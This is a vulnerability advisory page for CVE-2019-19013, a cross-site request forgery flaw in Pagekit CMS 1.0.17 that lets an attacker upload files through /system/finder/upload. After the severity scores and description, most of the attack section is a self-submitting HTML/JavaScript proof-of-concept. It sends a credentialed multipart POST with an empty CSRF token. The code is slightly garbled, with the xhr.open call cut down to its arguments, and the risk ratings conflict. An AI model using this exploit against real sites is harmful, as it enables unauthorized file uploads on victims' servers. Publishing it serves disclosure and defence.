Pagekit CMS 1.0.17 Cross Site Request Forgery

Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title: ==== Pagekit CMS 1.0.17 Cross-Site Request Forgery (CSRF) vulnerability Credit: ====== Name: Christian Bortone CVE: ==== CVE-2019-19013 Date: ==== 11/18/2019 (dd/mm/yyyy) Vendor: ====== Pagekit is a modern and lightweight open source CMS. Vendor link: Vulnerable Product: ============== Pagekit CMS 1.0.17 Abstract: ======= Cross-Site Request Forgery (CSRF) vulnerability in Pagekit 1.0.17 could allow an attacker to upload arbitrary file by removing the CSRF token from the request. Exploitation-Technique: =================== Remote Severity Rating (CVSS): =================== 4.6 (Medium) (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N) Details: ======= A Cross-Site Request Forgery (CSRF) vulnerability is discovered in Pagekit CMS which allows a remote attacker to upload forged files on the server without victim's knowledge by enticing authenticated user to visit attacker page/URL. The specific flaw exists within the handling of request to upload file in the store section. The application failed to validate CSRF token on the POST request (the token can be remove from the request). The request also contain a second token (WebkitFormBoudary) not tied to the session user. An attacker with less privilege on the system can operate a CRSF attack Vulnerable module/page/application: /site/storage (upload file) PoC Exploit code: ---------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest();"POST", "http:\/\/localhost\/pagekit\/system\/finder\/upload", true); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryJze564AoGkbRRRUz"); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9"); xhr.withCredentials = true; var body = "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" + "Content-Disposition: form-data; name=\"files[]\"; filename=\"test.jpg\"\r\n" + "Content-Type: image/jpeg\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" + "Content-Disposition: form-data; name=\"path\"\r\n" + "\r\n" + "/\r\n" + "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" + "Content-Disposition: form-data; name=\"root\"\r\n" + "\r\n" + "storage\r\n" + "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" + "Content-Disposition: form-data; name=\"_csrf\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryJze564AoGkbRRRUz--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } submitRequest(); </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> ----------------------------------------------------------------------------

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023,


Back to Top